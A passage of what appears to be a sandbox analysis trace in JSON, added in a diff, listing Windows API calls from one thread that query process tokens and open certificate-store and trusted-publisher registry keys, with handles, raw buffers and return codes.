"thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1239 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1240 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "p\\xf1[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x83!\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v2\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\x8c\\xf1[\\x05\\x98\\xf2[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\x08\\xf2[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f'sX\\xf2[\\x05\\xbb!\\xd6\\xfa<\\xed[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xffT\\xf2[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\x94\\xf2[\\x05\\xfc\\xf4\\xb4\\xf2T\\xf2D\\xf2\\xb8\\xf2\\x00\\x00<\\xff\\x00\\x00\\xfc\\xf4[\\x05\\xb4\\xf2[\\x05\\xb8\\xf2[\\x05\\x00\\x00\\x00\\x00h\\xf2[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\x94\\xf2[\\x05" + } + ], + "repeated": 0, + "id": 1241 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1242 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1243 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1244 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Disallowed\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Disallowed\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1245 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86a7", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1246 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1247 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1248 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1249 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1250 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1251 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "p\\xf1[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x83!\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v2\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\x8c\\xf1[\\x05\\x98\\xf2[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\x08\\xf2[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f'sX\\xf2[\\x05\\xbb!\\xd6\\xfa<\\xed[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xffT\\xf2[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\x94\\xf2[\\x05\\xf8\\xf4\\xb4\\xf2T\\xf2D\\xf2\\xb8\\xf2\\x00\\x00<\\xff\\x00\\x00\\xf8\\xf4[\\x05\\xb4\\xf2[\\x05\\xb8\\xf2[\\x05\\x00\\x00\\x00\\x00h\\xf2[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\x94\\xf2[\\x05" + } + ], + "repeated": 0, + "id": 1252 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1253 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1254 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1255 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1256 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86ce", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1257 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1258 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1259 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPublisher\\Safer" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPublisher\\Safer" + } + ], + "repeated": 0, + "id": 1260 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1261 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\xa8\\xf1[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\xbb!\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v1\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\xc4\\xf1[\\x05\\xd0\\xf2[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's@\\xf2[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's\\x90\\xf2[\\x05s\"\\xd6\\xfat\\xed[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\x8c\\xf2[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\xcc\\xf2[\\x05\\x08\\xf5\\xec\\xf2\\x8c\\xf2|\\xf2\\xf0\\xf2\\x00\\x00<\\xff\\x00\\x00\\x08\\xf5[\\x05\\xec\\xf2[\\x05\\xf0\\xf2[\\x05\\x00\\x00\\x00\\x00\\xa0\\xf2[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\xcc\\xf2[\\x05" + } + ], + "repeated": 0, + "id": 1262 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1263 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1264 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1265 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000520" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPublisher\\Safer" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPublisher\\Safer" + } + ], + "repeated": 0, + "id": 1266 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x7680d334", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1267 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1268 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\TrustedPublisher\\Safer" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\TrustedPublisher\\Safer" + } + ], + "repeated": 0, + "id": 1269 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1270 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1271 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e870b", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1272 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e8728", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1273 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c11d", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1274 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7705c125", + "parentcaller": "0x7705c061", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1275 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1276 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x767e878d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1277 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1278 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "8\\xf0[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\xcb \\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v/\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00T\\xf0[\\x05`\\xf1[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's\\xd0\\xf0[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's \\xf1[\\x05\\x83 \\xd6\\xfa\\x04\\xec[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\x1c\\xf1[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\\\xf1[\\x05\\xc0\\xf3|\\xf1\\x1c\\xf1\\x0c\\xf1\\x80\\xf1\\x00\\x00<\\xff\\x00\\x00\\xc0\\xf3[\\x05|\\xf1[\\x05\\x80\\xf1[\\x05\\x00\\x00\\x00\\x000\\xf1[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\\\xf1[\\x05" + } + ], + "repeated": 0, + "id": 1279 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1280 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1281 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1282 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000520" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1283 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e86ce", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1284 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\" + } + ], + "repeated": 0, + "id": 1285 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000520" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1286 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1287 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + 